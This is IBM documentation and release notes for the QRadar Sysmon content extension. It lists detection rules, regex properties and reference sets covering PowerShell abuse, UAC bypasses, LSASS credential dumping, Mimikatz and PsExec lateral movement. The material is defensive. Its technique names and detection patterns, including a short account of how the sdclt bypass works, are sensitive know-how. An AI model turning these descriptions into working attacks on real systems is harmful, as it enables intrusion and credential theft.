Sysmon
The IBM Security QRadar Sysmon Content Extension detects advanced threats on Windows endpoints by using Sysmon logs.
The Sysinternals Sysmon service adds several Event IDs to Windows systems. These new Event IDs are used by system administrators to monitor system processes, network activity, and files. Sysmon provides a more detailed view than the Windows security logs. For more information about Sysmon, see Secure Your Endpoints With QRadar Content for Sysmon (https://securityintelligence.com/news/secure-your-endpoints-with-qradar-content-for-sysmon/).
This content extension provides multiple use cases to detect advanced threats, such as PowerShell abuse, hidden Windows processes, fileless memory attacks, code obfuscation, and many more. This content extension includes new offenses rules, building blocks, reference sets, and custom functions that can help you detect these threats.
For more information about the use cases that are covered by this content extension, see the following videos:
This package on Fix Central includes only <MONTH> <YEAR> virtual device security updates and optional packages, installing this release will not update the App Host and the App Host version will not change. Please use App Host <VERSION> for App Host installation or updates.
Video Title | Video Link |
---|---|
Sysmon PowerShell Use Case 1 | https://youtu.be/PWiw-RpLIbw |
Sysmon PowerShell Use Case 2 | https://youtu.be/_eaMMo8sPtA |
Sysmon PowerShell Use Case 3 | https://youtu.be/sZUAuYpSe7Q |
Sysmon Use Case 4 Bogus Windows Processes | https://youtu.be/gAS-B9gb3RY |
Sysmon Use Case 5 Detecting other Libraries | https://youtu.be/omWnyACNEcM |
Sysmon Use Case 6 Nasty Injection & Encoded Attacks | https://youtu.be/kC2hIJxqF8Q |
QRadar Privilege Escalation Detection Use Case 7 | https://www.youtube.com/watch?v=yitGRL-WJCM |
QRadar Privilege Escalation Continued Use Case 8 | https://www.youtube.com/watch?v=8u6G6SEw3kE |
Sysmon Use Case 9 - More Privilege Escalation Detection | https://www.youtube.com/watch?v=0Wy59Otr_Ag |
Sysmon Use Case 10 - Creating an Admin Account | https://www.youtube.com/watch?v=bJgaFSjuMSs |
Sysmon Detecting Name Pipe Impersonation | https://www.youtube.com/watch?v=pSBQ7NabDUY |
Sysmon Detecting Mimikatz | https://www.youtube.com/watch?v=gKa_CZAz3Jc |
QRadar Lateral Movement Detection, Example One | https://www.youtube.com/watch?v=IBEIN9sl4lk |
QRadar Lateral Movement Detection Example Two | https://www.youtube.com/watch?v=whjpScDYaY4 |
QRadar Lateral Movement Detection Example Three (Plain Windows Features) | https://www.youtube.com/watch?v=7PXzi3pbmFo |
IBM Security QRadar Sysmon
- IBM Security QRadar Sysmon Content Extension 1.3.1
- IBM Security QRadar Sysmon Content Extension 1.3.0
- IBM Security QRadar Sysmon Content Extension 1.2.1
- IBM Security QRadar Sysmon Content Extension 1.2.0
- IBM Security QRadar Sysmon Content Extension 1.1.3
- IBM Security QRadar Sysmon Content Extension 1.1.2
- IBM Security QRadar Content Extension 1.1.1
- IBM Security QRadar Sysmon Content Extension 1.1.0
- IBM Security QRadar Sysmon Content Extension 1.0.0
IBM Security QRadar Sysmon Content Extension 1.3.1
The following table shows the updated custom properties in IBM Security QRadar Sysmon Content Extension 1.3.1.
Name | Description |
---|---|
Image | The "\bImage:\s.?\\([\\]?)(?:FileVersion|CommandLine):\s"
expression is now
"\bImage:\s.?\\([\\]?)\s(?:FileVersion|CommandLine):\s" |
IBM Security QRadar Sysmon Content Extension 1.3.0
The Detected a Scheduled Task over Multiple Hosts custom rule received an update to its rule filter. This update is a functional change to ensure if multiple commands are run, each get its own offense.
IBM Security QRadar Sysmon Content Extension 1.2.1
The following table shows the updated custom properties in IBM Security QRadar Sysmon Content Extension 1.2.1.
Name | Description |
---|---|
Image | The New Process Name:\s(.*?)Token Elevation Type\: expression is now
New Process Name[:\s\\=]*(.*?)\s+(?:Token Elevation Type) |
ShareName | The Share\sName\:\s*(?:\\\\\*\\)(.*)\s\sShare\sPath expression is now
Share\sName\:\s*(?:\\\\\*\\)(.*?)\s+Share\sPath |
IBM Security QRadar Sysmon Content Extension 1.2.0
The following table shows the custom properties in IBM Security QRadar Sysmon Content Extension 1.2.0.
Name | Description |
---|---|
Image | The SourceImage\:\s(.*)\sTargetProcessGuid expression is now
SourceImage\:\s(.*?)\sTargetProcessGuid The Image:\s(.*)\sUser\: expression is now Image:\s(.*?)\sUser\: The Image:\s(.*?)\s(FileVersion|CommandLine): expression is now \bImage:\s(.*?)\s(?:FileVersion|CommandLine): The New\sProcess\sName:\s*(.*)\s{2}Token\sElevation\sType\: expression is now New Process Name:\s(.*?)Token Elevation Type\: The SourceImage\:\s(.*)\sTargetProcessG expression is now SourceImage\:\s.*?\\([^\\]*?)\sTargetProcessG The following expressions are disabled:
|
ImageName | The Image:\s(?:.*\\)?(.*?)\s(?:FileVersion|CommandLine):\s expression is now
\bImage:\s.*?\\([^\\]*?)(?:FileVersion|CommandLine):\s The Image:\s(?:.*\\)?(.*)\sImageLoaded expression is now Image:.*?\\([^\\]*?)\sImageLoaded The Image:\s(?:.*\\)?(.*)\sTargetFilename\: expression is now Image:.*?\\([^\\]*?)\sTargetFilename The Image:\s(?:.*\\)?(.*)\sUser\: expression is now Image:\s.*?\\([^\\]*?)\sUser\: The Image\:\s(?:.*\\)?(.*)\sTargetObject expression is now Image\:\s.*?\\([^\\]*?)\sTargetObject The SourceImage\:\s(?:.*\\)?(.*)\sTargetProcessGuid expression is now SourceImage\:\s.*?\\([^\\]*?)\sTargetProcessGuid The New\sProcess\sName:\s*(?:.*\\)?(.*)\s{2}Token\sElevation\sType\: expression is now New Process Name:\s.*?\\([^\\]*?)Token Elevation Type\: The following expressions are disabled:
|
Process CommandLine | The Process Command Line:\s(.*)\sToken Elevation Type expression is now Process Command Line[:\s\\=]+(.*?)\s*(?:Token Elevation Type) |
ServiceName | The Service Name\:\s*(.*)\sService\sFile expression is now (?i)Service Name[\:\s\=\\]*(.*?)\s+(?:Service File Name:|&&) |
SourceImage | This custom property is removed from the content extension. |
The following table shows the rules updated in IBM Security QRadar Sysmon Content Extension 1.2.0.
Name | Description |
---|---|
Thread Creation by a Process Launched from a Shared Folder | Now uses the Image custom property instead of the SourceImage custom property. |
The following rules and building blocks are removed in IBM Security QRadar Sysmon Content Extension 1.2.0 because they are duplicates of rules in the IBM Security QRadar Endpoint content extension.
- BB:BehaviorDefinition: Administrative Share Accessed
- Credential Dumping using SAM Registry Key
- Encoded Command Malicious Usage in a Programming Environment
- Fileless UAC Bypass using Fodhelper
- Fileless UAC Bypass using sdclt
- Fileless UAC Bypass using Windows Event Viewer
- Process Launched by an Unusual Process
- Programming Environment Started with a Privileged Account
- Service Configured to Use Powershell
- Suspicious PSExec Module Usage Detected
The Suspicious PSExec Module Usage Detected rule used to be called Metasploit PSExec Module Usage.
The Powershell Malicious Usage Detected rule has been removed and replaced by the File Decode or Download followed by Suspicious Activity in the Endpoint content pack.
IBM Security QRadar Sysmon Content Extension 1.1.3
The following table shows the custom properties in IBM Security QRadar Sysmon Content Extension 1.1.3.
Name | Optimized | Capture Group | Regex |
---|---|---|---|
Service Name | Yes | 1 | Service Name\:\s*(.*)\sService\sFile |
ServiceFileName | Yes | 1 | Service\sFile\sName\:\s*(.*)\sService\sType |
The following table shows the rules and building blocks in IBM Security QRadar Sysmon Content Extension 1.1.3.
Type | Name | Description |
---|---|---|
Rule | Download via Encoded Command Initiated | This rule triggers when a download of a PowerShell script is initiated from a programming environment type cmd or Powershell. |
Rule | Malicious Service Installed | This rule triggers when a service categorized as malicious has been installed. |
Rule | Metasploit PSExec Module Usage | This rule triggers when a usage of the PSExec module is detected. |
Rule | PSExec Process Observed on a Compromised Host | This rule triggers when a PsExec process has been detected on a compromised host. |
Rule | Remote Management Service Connected to lsass Pipe | This rule triggers when a remote management service is connected to lsass pipe. |
Rule | Service Binary Located in a Shared Folder | This rule triggers when a service binary is located in a shared folder. |
Rule | Service Configured to Use a Pipe | This rule triggers when a service is configured to use a pipe. |
Rule | Service Configured to Use Powershell | This rule triggers when a service is configured to use Powershell. |
Rule | Service Installed on a Compromised Host | This rule triggers when a service has been created on a compromised host. |
The following table shows the custom properties, rules, and building blocks that are renamed in IBM Security QRadar Sysmon Content Extension 1.1.3.
Old Name | New Name |
---|---|
A Hidden Network Share Has Been Added | Hidden Network Share Added |
A Malicious Service Has Been Installed in a System | Malicious Service Installed |
A Network Share Has Been Accessed From a Compromised Host | Network Share Accessed from a Compromised Host |
A Network Share Has Been Added In a Compromised Host | Network Share Added to a Compromised Host |
A Pipe Has Been Created Followed by Updating Service Binary Path to Connect to The Created Pipe | Pipe Created Followed by Service Binary Path Update |
a Remoting Service Created a Powershell Script File | Powershell Script Created by a Remote Management Service |
A Scheduled Task Has Been Created in a Compromised Host | Scheduled Task Created on a Compromised Host |
A Service Has Been Installed in a Compromised Host | Service Installed on a Compromised Host |
Abnormal Parent for a System Process | Unusual Parent for a System Process |
An Administrative share Has Been Accessed | Administrative Share Accessed |
An Administrative share Has Been Accessed From a Compromised Machine | Administrative Share Accessed from a Compromised Host |
BB: A Scheduled Task Has Been Created | BB:CategoryDefinition: Scheduled Task Creation |
BB: An Administrative share Has Been Accessed | BB:BehaviorDefinition: Administrative Share Accessed |
BB: CreateRemoteThread Detected | BB:CategoryDefinition: Remote Thread Creation |
BB: CreateRemoteThread excluded cases | BB:BehaviorDefinition: Remote Thread Creation False-Positives |
BB: Detected a Powershell Process | BB:CategoryDefinition: Programming Environment |
BB: Detected a Scheduled Task based on Process Creation Event Part 2 | BB:CategoryDefinition: Scheduled Task Creation by a Process |
BB: Normal Windows Processes Accessed lsass.exe | BB:CategoryDefinition: Processes Allowed to Access lsass |
BB: Pipe Has Been Created | BB:CategoryDefinition: Pipe Creation |
BB: Process created a Network Connection | BB:CategoryDefinition: Network Connection |
BB: PsExec Has Been Detected | BB:BehaviorDefinition: PsExec Process Observed |
BB: Service Binary Path Has Been Set or Updated | BB:BehaviorDefinition: Service Binary Path Set or Update |
Childless Process Launched/Spawned a Process | Process Launched by an Unusual Process |
Command Shell Started With a System Privileges | Programming Environment Started With a Privileged Account |
Detected a Fileless UAC Bypass using Fodhelper | Fileless UAC Bypass using Fodhelper |
Detected a Fileless UAC Bypass using sdclt | Fileless UAC Bypass using sdclt |
Detected a Fileless UAC Bypass using Windows Event Viewer | Fileless UAC Bypass using Windows Event Viewer |
Detected A Known Process Started With A New Unseen Hash | Known Process Started with A Different Hash |
Detected a Long Value in Windows Registry | Unusual Value Size in Windows Registry |
Detected a Malicious Access to lsass Process | Suspicious Access to lsass Process |
Detected a Malicious Access to lsass Process from Unknown Call Trace | Suspicious Access to lsass Process from Unknown Call Trace |
Detected a New Unseen Process Started with a System User Privileges | New Process Started with a Privileged Account |
Detected a Possible Credential Dumping Tool | Potential Credential Dumping Tool Detected |
Detected a Possible Keylogger | Potential Keylogger Detected |
Detected a Remotely Executed Process over Multiple Hosts | Remote Process Execution on Multiple Hosts |
Detected a Remoting Service Connected to Lsass Pipe | Remote Management Service Connected to lsass Pipe |
Detected a Scheduled Task over Multiple Hosts | Scheduled Task Created on Multiple Hosts |
Detected a Service Binary Path Changed followed by a User or Group Added | Service Binary Path Update Followed by User or Group Modification |
Detected a Service Configured to Use a Pipe | Service Configured to Use a Pipe |
Detected a Service Configured to Use Powershell | Service Configured to Use Powershell |
Detected a Service with an Executable Binary Located in a Shared Folder | Service Binary Located in a Shared Folder |
Detected a Suspicious Svchost Process | Suspicious Svchost Process |
Detected Abnormal Parent for a Process | Unusual Parent for a Process |
Detected An Unknown / Unseen Process (Based On The Process Hash) | Unknown Process Hash Observed |
Detected An Unknown / Unseen Process (Based On The Process Name) | Unknown Process Name Observed |
Detected Excessive Execution of SC Command | Excessive Use of SC Command |
Detected Excessive Usage of System Tools From a Single Machine | Excessive System Tools Usage from a Single Host |
Detected Mimikatz Based on IMP Hash | Mimikatz IMP Hash Observed |
Detected PsExec with a Different Process Name | PsExec Process Masquerading |
Excessive Failed Attempts to Access a Network Shared Resource From a Compromised Host | Excessive Network Share Access Failures from a Compromised Host |
Excessive Failed Attempts to Access an Administrative Share From a Single source | Excessive Administrative Share Access Failures from the Same Host |
Lsass Process Connected to a Pipe | Lsass Process Connected to a Pipe |
Metasploit PSExec Module Has Been Detected | Metasploit PSExec Module Usage |
Possible Locky Ransomware detected based on rundll32 with qwerty argument | Rundll32 with qwerty Argument Usage |
Possible UAC Bypass - A Scheduled Task Has Been Configured to Run With Highest Privileges | UAC Bypass - Scheduled Task Configured to Run With Highest Privileges |
Powershell Has Been Launched | Powershell Process Observed |
Powershell Has Been Launched in a Compromised Host | Powershell Process Observed on a Compromised Host |
Powershell Malicious Usage Detected with Encoded Command | Encoded Command Malicious Usage in a Programming Environment |
Powershell Script download with EncodedCommand | Download via Encoded Command Initiated |
Process Baselining: Process Hash | Process Baselining: Process Hash |
Process Baselining: Process Name | Process Baselining: Process Name |
Process Baselining: Process Name to Hash | Process Baselining: Process Name to Hash |
Process Baselining: Process Name to Parent Process | Process Baselining: Process Name to Parent Process |
Process Baselining: Process Started with a System User Privileges | Process Baselining: Process Started with System User Privileges |
Process Created a Thread From a Process That was Launched From a Temp Directory | Thread Creation by a Process Launched From a Temp Directory |
Process Created a Thread Into Another Process | Thread Creation into a Process different from the Initial one |
Process Created a Thread into lsass Process | Thread Creation into lsass Process |
Process Created a Thread into System Process | Thread Creation into a System Process |
Process Launched From a Shared Folder | Process Launched from a Shared Folder |
Process Launched From a Shared Folder and Created Thread into Another Process | Thread Creation by a Process Launched from a Shared Folder |
Process Launched From Temp Directory | Process Launched from a Temp Directory |
Process Loaded Executable from Temp Directory | Executable Loaded from Temp Directory |
Process Started from Unusual Directories (Recycle.bin, ..) | Process Launched from Unusual Directory |
PsExec Has Been Detected | PsExec Process Observed |
PsExec Has Been Launched From a Compromised Host | PsExec Process Observed on a Compromised Host |
SAM Registry key - Enumerate sub-keys (users) | Credential Dumping using SAM Registry Key |
Service Binary Path Has Been Updated Followed by a CreateRemoteThread Detected From the Same Process | Service Binary Path Update Followed by Remote Thread Creation |
Service Binary Path Has Been Updated Followed by a Network Connection From the Same Process | Service Binary Path Update Followed by Network Connection |
Shadow Copies Delete Detected | Shadow Copies Deletion |
System Process Started From Unusual Directory | System Process Launched From Unusual Directory |
Unsigned Driver Has Been Loaded Into Windows Kernel | Unsigned Driver Loaded In Windows Kernel |
Unsigned Executable Loaded Into lsass.exe | Unsigned Executable Loaded In lsass |
Unsigned Executable Loaded Into Sensitive System Process | Unsigned Executable Loaded In Sensitive System Process |
Whoami /groups Has Been Executed | Group or Account Discovery |
IBM Security QRadar Sysmon Content Extension 1.1.2
The following table shows the custom properties in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Regex |
---|---|
Image | Image:\s(.*?)\s(FileVersion|CommandLine): |
ImageName | Image:\s(?:.*\\)?(.*?)\s(?:FileVersion|CommandLine):\s |
LoadedImage | ImageLoaded:\s(.*?)\s(FileVersion|Hashes)\: |
LoadedImageName | ImageLoaded\:\s(?:.*\\)(.*?)\s*(FileVersion|Hashes)\: |
The following table shows the rules and building blocks in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Description |
---|---|
Process Baselining: Process Name to Hash | Added a rule response to populate the ProcessNametoHashRefMapOfSetKeys reference set. |
Process Baselining: Process Name to Parent Process | Added a rule response to populate the ProcesstoParentProcessPathRefMapKeys reference set. |
Detected A Known Process Started With A New Unseen Hash | Detects when a known process starts with a new unseen hash. |
Detected Abnormal Parent for a Process | Detects an abnormal parent for a process. |
Process Baselining: Process Hash | Provides a baseline for process hashes. |
Process Baselining: Process Name | Provides a baseline for process names, with standard Windows logs or Sysmon logs. |
Detected An Unknown / Unseen Process (Based On The Process Hash) | Detects any unusual or unknown process hashes. |
Detected An Unknown / Unseen Process (Based On The Process Name) | Detects any unusual or unknown process names. |
Process Launched From a Shared Folder and Created Thread into Another Process | Updated one of the rule tests. |
The following table shows the reference data in IBM Security QRadar Sysmon Content Extension 1.1.2.
Type | Name | Description |
---|---|---|
Reference Set | Profiled Process Names | Stores the baseline list of process names. |
Reference Set | Profiled Process Hashes | Stores the baseline list of process hashes. |
Reference Set | ProcessNametoHashRefMapOfSetKeys | Stores the keys used in the map of sets that maps a process name to its hash. |
Reference Set | ProcesstoParentProcessPathRefMapKeys | Stores the keys used in the map of sets that maps a process name to its parent process. |
Reference Map of Sets | ProcessMaptoProcessParentPath | Changed the element type to alpha-numeric ignore case. |
Reference Map of Sets | ProcessNametoHash | Changed the element type to alpha-numeric ignore case. |
The following table shows the saved searches in IBM Security QRadar Sysmon Content Extension 1.1.2.
Name | Description |
---|---|
Unknown Process Hash Has Been Started | Updated the search criteria. |
Abnormal Parent for a Process | Updated the search criteria. |
Unknown Process Name Has Been Started | This search shows unknown processes based on the proces name. |
IBM Security QRadar Content Extension 1.1.1
- Rule: Detected a Known Process Started With Unseen Hash
- Rule: Detected Abnormal Parent for a Process
- Custom function: checkWithMapOfSets
- Custom function: IsItWhiteListedProcess
IBM Security QRadar Sysmon Content Extension 1.1.0
- Privilege escalation
- Fileless user account control (UAC) bypasses
- Credential dumping
- Lateral movement techniques
- The Metasploit PSExec implementation
- Malicious PowerShell usage
This version also includes new custom properties, saved searches, and AQL custom function. A new icon is added to the QRadar admin settings to configure an authorization token for Sysmon custom functions.
The following table describes the changes that are included in IBM Security QRadar Sysmon Content Extension 1.1.0
Type | Name | Change description |
---|---|---|
Rule | Unusual Process (ex: word, iexplore, AcroRd..) launched a Command Shell | Detects if an unusual process, such as MS Word, Internet Explorer, Acrobat Reader, starts a command shell or PowerShell. |
Rule | Detected a Remotely Executed Process over Multiple Hosts | Detects any remotely run process that uses PowerShell, wmi, or PSExec as well-known lateral movement techniques. |
Rule | Detected a Scheduled Task over Multiple Hosts | Detects a scheduled task over multiple hosts. |
Rule | Metasploit PSExec Module Has Been Detected | Detects the Metasploit implementation of the PSExec tool. |
Rule | PSExec Has Been Launched From a Compromised Host | Detects if PSExec is going to be launched from a host that is marked as a compromised host. |
Rule | PSExec Has Been Detected | Detects if any host launches PSExec. |
Rule | Detected PSExec with a Different Process Name | Detects if PSExec is uploaded with a different name. |
Rule | Command Shell Started With a System Privileges | Detects if a command shell is started with escalated privileges. For example, if a regular user starts the command shell as a Windows System user. |
Rule | Process Baselining: Process Started with a System User Privileges | Provides a baseline for which processes usually start with a system privilege. This baseline is used by other rules to detect if a new process starts with a system privilege. This baseline can indicate whether someone tries to do a privilege escalation. |
Rule | Detected a New Unseen Process Started with a System User Privileges | Detects if a new or unusual process starts with a system privilege. By default this rule is disabled. As part of your maintenance routine, run the process baseline rules for one week before you enable this rule. |
Rule | Process Baselining: Process Name to Parent Process | Provides a baseline to identify the parent processes for each process. This baseline can help to detect unusual processes. |
Rule | Process Baselining: Process Name to Hash | Provides a baseline for process names and their corresponding hashes. This baseline can help to detect if an unknown process starts, or if a process starts with a new hash. This information can also be used to integrate Sysmon logs with other logs. |
Rule | Detected Excessive Usage of System Tools From a Single Machine | Detects excess usage from a single machine of several system tools such as:
|
Rule | Detected a Service Configured to Use PowerShell | Detects if any service is configured to use PowerShell. |
Rule | Detected a Long Value in Windows Registry | Detects if an attacker tried to add or set a registry key by using a long value, such as a PowerShell encoded command. |
Rule | Detected a Service with an Executable Binary Located in a Shared Folder | Detects if any service is configured to start an executable binary from a shared folder. |
Rule | Detected a Service Configured to Use a Pipe | Detects if any service is configured to connect to a pipe. |
Rule | A Pipe Has Been Created Followed by Updating Service Binary Path to Connect to The Created Pipe | Detects a named pipe impersonation, which is a technique for privilege escalation. |
Rule | Detected a Service Binary Path Changed followed by a User or Group Added | Detects if a user or group is added after a service binary path changed. |
Rule | Service Binary Path Has Been Updated Followed by a Network Connection From the Same Process | Detects if a process attempts to configure or add a service and detects if the same process creates an outbound connection. |
Rule | Detected Excessive Execution of SC Command | Detects if the service controller command is used excessively. |
Rule | Detected an Unquoted Service Binary Path with Spaces | Detects if an unquoted service binary path contains spaces. A file path that is not enclosed within quotation marks and contains spaces in the path can be leveraged. For example, C:\Program Files (x86)\. |
Rule | Possible UAC Bypass - A Scheduled Task Has Been Configured to Run With Highest Privileges | Detects if a scheduled task is created to run by using the highest privileges. |
Rule | Service Binary Path Has Been Updated Followed by a CreateRemoteThread Detected From the Same Process | Detects if a process attempts to configure or add a service, and detects if the same process creates a thread into other processes. |
Rule | Process Launched From a Shared Folder | Detects if any process starts from a shared folder. |
Rule | Process Launched From a Shared Folder and Created Thread into Another Process | Detect if a process starts from a shared folder and creates a thread in another process. |
Rule | A Remoting Service Created a PowerShell Script File | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, creates a PowerShell script file. |
Rule | LSASS Process Connected to a Pipe | Detects if any pipe connects to an activity that is initiated from the Local Security Authority Subsystem Service (LSASS) process, which can lead to dumping credentials. |
Rule | Detected a Remoting Service Connected to LSASS Pipe | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, attempts to connect to a pipe called LSASS. |
Rule | Detected a Fileless UAC Bypass using sdclt | Detects a user account control (UAC) bypass attempt that uses sdclt.exe, the Windows process that allows users to run backup and restore operations. By default, sdclt.exe runs with a high integrity level. After the process starts, it looks for specific keys in the registry. If the keys exist, it runs them. |
Rule | Detected a Fileless UAC Bypass using Fodhelper | Detects if the Fodhelper process is used to bypass UAC in Windows 10 by hijacking a special key in the registry. |
Rule | Detected a Fileless UAC Bypass using Windows Event Viewer | Detects if the Windows event viewer is used to bypass UAC. |
Rule | Unsigned Driver Has Been Loaded Into Windows Kernel | Detects any attempt to load an unsigned driver into the Windows kernel. |
Rule | A Service Has Been Installed in a Compromised Host | Detects any service installation on a host that is marked as a compromised host. |
Rule | A Scheduled Task Has Been Created in a Compromised Host | Detects any attempt to create a scheduled task on a host that is marked as a compromised host. |
Rule | Excessive Denied SMB Traffic From a Compromised Host | Detects excessive SMB traffic that is denied from a compromised host. |
Rule | Excessive Failed Attempts to Access an Administrative Share From a Single source | Detects excessive failed attempts to access administrative shares from a single source host. |
Rule | Excessive Failed Attempts to Access a Network Shared Resource From a Compromised Host | Detects excessive failed attempts to access shared folders over multiple hosts in the network from a compromised host. |
Rule | A Network Share Has Been Accessed From a Compromised Host | Detects if a compromised host successfully accessed a shared folder. |
Rule | A Network Share Has Been Added In a Compromised Host | Detects if a compromised host adds a shared folder or file. |
Rule | Detected SMB Traffic From a Compromised Host Into Other Hosts | Detects outbound SMB traffic from a compromised host to other hosts. |
Rule | Detected a Successful Login From a Compromised Host Into Other Hosts | Detects successful logins from a compromised host to other hosts. |
Rule | An Administrative share Has Been Accessed | Detects if an administrative share is accessed. |
Rule | A Hidden Network Share Has Been Added | Detects the creation of a hidden shared file. |
Rule | PowerShell Has Been Launched | Detects if a host starts PowerShell. |
Rule | PowerShell Has Been Launched in a Compromised Host | Detects if a compromised host starts PowerShell. |
Rule | A Malicious Service Has Been Installed in a System | Detects if a known malicious service is installed in the system. |
Rule | Childless Process Launched/Spawned a Process | Detects if a process that is intended to be childless launches a child process. |
Rule | Shadow Copies Delete Detected | Detects if shadow copies are deleted. |
Rule | Detected a Suspicious Svchost Process | Detects a malicious svchost process. |
Rule | Detected Mimikatz Based on IMP Hash | Detects the Mimikatz post-exploitation tool based on whether the Invoke Mimikatz PowerShell (IMP) Hash is used. |
Rule | A Command Shell or Powershell Has been Launched From a Remote System | Detects if any remoting service, such as wsmprovhost, psexesvc, or wmiprvse, starts a command shell or PowerShell on a remote system. |
Rule | Whoami /groups Has Been Executed | Detects if the whoami or group command is used by before any privilege escalation technique. |
Rule | SAM Registry key - Enumerate sub-keys (users) | Detects any attempt to enumerate the SAM registry key. |
Rule | Detected a Registry Dump For SAM or System Key | Detects any attempt to dump the SAM registry. |
Rule | SAM Registry key Has Been Accessed - using regedit | Detects any attempt to access the SAM registry key |
Rule | Process Created a Thread into LSASS Process | Detects any attempt to create a thread into the LSASS process. |
Rule | Unsigned Executable Loaded Into LSASS.exe | Detects any attempt to load an unsigned executable file into the LSASS process. |
Rule | Detected a Malicious Access to LSASS Process | Detects any malicious access to the LSASS process. |
Rule | Detected a Malicious Access to LSASS Process from Unknown Call Trace | Detects any fileless attempts to access the LSASS process. |
Rule | Process Started from Unusual Directories (Recycle.bin, ..) | Detects if a process starts from an unusual directory, such as the recycle bin. |
Rule | Detected a Possible Credential Dumping Tool |
Used as an extra mark if any of the following rules match:
|
Rule | Detected a Possible Keylogger | Detects if a machine is infected with a keylogger. |
Rule | Possible Locky Ransomware detected based on rundll32 with qwerty argument | Detect a known signature for Locky ransomware. |
Rule | PowerShell Malicious Usage Detected with Encoded Command | Updated to detect more malicious uses of PowerShell. |
Rule | PowerShell Malicious Usage Detected | Updated to detect more malicious uses of PowerShell. |
Building Block | BB: PSExec Has Been Detected | Used in the PSExec rules. |
Building Block | BB: Process created a Network Connection | Used in rules that correlate network connections with other activities. |
Building Block | BB: An Administrative share Has Been Accessed | Used in rules that detect any malicious activities with shared folders. |
Building Block | BB: CreateRemoteThread Detected | Used in rules that detect the creation of remote threads. |
Building Block | BB: Normal Windows Processes Accessed LSASS.exe | Used in rules that detect the LSASS process. |
Building Block | BB: Detected a PowerShell Process | Used in rules that detect PowerShell processes. |
Building Block | BB: A Scheduled Task Has Been Created | Used in rules that detect scheduled tasks. |
Building Block | BB: Detected a Scheduled Task based on Process Creation Event Part 1 | Used in rules that detect scheduled tasks based on process event creation. |
Building Block | BB: Pipe Has Been Created | Used in rules that detect pipe creation. |
Building Block | BB: Detected a Scheduled Task based on Process Creation Event Part 2 | Used in rules that detect scheduled tasks based on process event creation. |
Building Block | BB: Service Binary Path Has Been Set or Updated | Used in rules that detect if a service path binary is set or updated. |
Building Block | BB: CreateRemoteThread excluded cases | Used in rules that detect the creation of remote threads. |
Saved Search | Abnormal Parent for a Process | This search shows any process with an unusual parent, based on the baselined data |
Saved Search | Network Connection Detected by Windows Sensitive Processes | This search shows any connection that is initiated from a Windows sensitive process. |
Saved Search | Process Access to LSASS | This search shows any process that accessed LSASS. |
Saved Search | Remotely Launched Executables via WMI or PowerShell | This search shows processes that were run remotely. |
Saved Search | Service Binary Path Has Been Set or Updated | This search shows any new service or if the location of the service binary changes. |
Saved Search | Unknown Process Hash Has Been Started | This search shows any unseen process hashes. |
Saved Search | Unsigned Executable Loaded Into Sensitive System Process | This search shows any attempt to load an unsigned executable file into sensitive system processes. |
Saved Search | Very Long Command Line Detected | This search shows long command line text. |
Reference Set | Whitelisted Hashes | Contains a list of whitelisted hashes. |
Reference Set | Systools | Contains a list of tools that are used by system administrators. |
Reference Set | Processes Hashes Started as System User | Contains a list of process hashes that can start with a system level privileges. |
Reference Set | Compromised Hosts | Contains a list that is populated with any compromised hosts. |
Reference Set | Process Name to Hash | Contains a list of process names that are mapped to their hashes. |
Reference Set | IOCs - Malicious Service Names | Contains a list of well-known malicious service names. |
IBM Security QRadar Sysmon Content Extension 1.0.0
The following table describes the changes that are included in IBM Security QRadar Sysmon Content Extension 1.0.0
Type | Name | Change description |
---|---|---|
Rule | Unsigned Executable or DLL Loaded from Temp Directory | Detects when unassigned executable or DLL is loaded from a temporary directory. |
Rule | Process Launched From Temp Directory | Detects when a process is launched from a temporary directory. |
Rule | Unsigned Executable or DLL Loaded Into Sensitive System Process | Detects when an unassigned executable or DLL is loaded into another sensitive system processes. |
Rule | Process Created a Thread into System Process | Detects when a process creates a thread in a system process. |
Rule | Process Created a Thread From a Process That was Launched From a Temp Director | Detects when a process creates a thread from a process that was launched from a temporary directory. |
Rule | Process Created a Thread Into Another Process | Detects when a process creates a thread in another process. |
Rule | PowerShell Malicious Usage Detected | Detects malicious PowerShell usage. |
Rule | PowerShell Malicious Usage Detected with Encoded Command | Detects malicious PowerShell usage with an encoded command. |
Rule | PowerShell script has been downloaded | Detects when a PowerShell script is downloaded. |
Rule | System Process Started from Unusual Directory | Detects when a system process starts from an unusual directory. |
Rule | Abnormal Parent for a System Process | Detects when an abnormal parent for a system process is present. |
Rule | Suspicious svchost Process Detected | Detects suspicious svchost processes. |
Rule | Shadow Copies Delete Detected | Detects when a shadow copy file is deleted. |
Building Block | BB: Unsigned Executable or DLL Loaded Into Sensitive System Process Part 1 | Used by the Unsigned Executable or DLL Loaded Into Sensitive System Process rule. |
Building Block | BB: Detected a downloaded PowerShell Script | Used by the PowerShell script has been downloaded rule. |
Building Block | BB: Detected a downloaded PowerShell Script with EncodedCommand | Used by the PowerShell Malicious Usage Detected with Encoded Command rule. |
Custom Property | Image | Image:\s(.*)\sImageLoaded |
Custom Property | ImageName | Image:\s(?:.*\\)(.*)\sImageLoaded |
Custom Property | Signed | Signed:\s(true|false) |
Custom Property | Signature | Signature:\s(.*)\sSignatureStatus |
Custom Property | SignatureStatus | SignatureStatus:\s(Valid) |
Custom Property | LoadedImage | ImageLoaded:\s(.*)\sHashes |
Custom Property | Image | Image:\s(.*)\sCommandLine |
Custom Property | ImageName | Image:\s(?:.*\\)(.*)\sCommandLine |
Custom Property | ParentImage | ParentImage:\s(.*)\sParentCommandLine |
Custom Property | ParentImageName | ParentImage:\s(?:.*\\)(.*)\sParentCommandLine |
Custom Property | Target Image Name | TargetImage:\s(?:.*\\)(.*)\sNewThreadId |
Custom Property | SourceImage | SourceImage:\s(.*)\sTargetProcessGuid |
Custom Property | TargetImage | TargetImage:\s(.*)\sNewThreadId |
Custom Property | PS Encoded Command | [\-^]{1,2}[Ee^]{1,2}[NnCcOoDdEeMmAa^]*[\s^]+(\S+) |
Custom Property | Process CommandLine | CommandLine:\s(.*)\sCurrentDirectory |
Custom Property | SourceImageTempPath | SourceImage:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | ImageTempPath | Image:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | ImageLoadedTempPath | ImageLoaded:\s+.*((?:Windows\\Temp)|(?:AppData\\Local\\Temp))\\.* |
Custom Property | Process CommandLine | Process Command Line:\s*(.*)\s*Token Elevation Type |
